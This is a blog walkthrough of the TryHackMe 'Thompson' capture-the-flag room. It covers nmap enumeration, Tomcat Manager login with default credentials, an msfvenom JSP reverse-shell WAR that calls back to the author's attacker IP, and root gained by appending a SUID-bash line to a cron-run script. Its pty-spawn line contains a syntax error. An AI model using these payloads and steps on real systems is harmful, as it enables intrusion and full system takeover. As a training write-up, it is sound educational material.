TryHackMe: Thompson CTF Walkthrough
Hello Readers! Today's walk through the Thompson CTF machine from TryHackMe . The room is simple and fun, it contained basic penetration testing and privilege escalation. The main goal of this room is to get two flags from user.txt and root.txt.
First thing that we always have to do is connect your machine with tryhackme network through VPN.
Enumeration And Findings
Once I get the IP address let’s just wait for 2-3 minutes, so that machine can boot properly.
Let us start our enumeration as usual with nmap.
nmap -sC -sV -oA <IP>
Let’s check for the HTTP port i.e 8080 here. After opening the page, I can see the tomcat server as mentioned in the nmap scan results also.
Let me search more about this webpage, I found Server Status, Manager App and Host Manager.
Let me check them.
These pages looks good as it required credential to move forward, but as of now, I don’t have any credentials so let me click Cancel button.
After pressing on Cancel, I get default login details. So, let me try them.
Username: - tomcat
Password: - s3cret
Wow! Default username and password works. Now I must get the shell here. Let me create the reverse shell and upload here.
When I scrolled down I found upload tab which required .raw file to upload.
Now I have and idea to upload my reverse shell code using msfvenom tool.
As for reverse shell I have to put my Local system IP address.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.8.77.36 LPORT=1234 -f war > jspshell.war
Now it is time to upload this shell.
Click no Browse.. and Deploy once select the correct file which is jspshell.war
I have successfully uploaded this jspshell code to the system.
Click on the “Deploy” and the reverse shell will be uploaded on the web.
Now …it’s time to access this using web browser.
For that I must run the listener on my end first so that it will connect with the target system.
Everything is set and now I must click on /jspshell which is uploaded to target system which we need to access the system shell.
Once I click, I will get the reverse /jspshell.
Here the page is open but did not show anything, I have to check the shell which I run in our local system.
i GOT THE SHELL.
Now I am able work with reverse shell, I only and get user access and found user.txt. I also have to find root.txt.
Now I have to spawn the shell so that I can perform some task easily.
python -c 'import pty: pty.spawn("/bin/sh")
Finally, i got the user flag, now I must do the privilege escalation.
Here I can also found "id.sh" file which has full permission to do anything with it. Look's interesting !
Now I have to enumeration more about id.sh file.
Here what I found.
I found that id.sh is executed continuously in a minute and with the root permission.
This sounds interesting for me!
Now I have to create some script and add it in for getting root access of this machine.
Finally I made it !
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /home/jack/id.sh
I am root !
I can do anything now.
Now I go for the both flag value
Here I got the user.txt
Here I got the root.txt.
HURRAY!!! … I got both the flags.
Thanks for reading and I hope you liked this blog.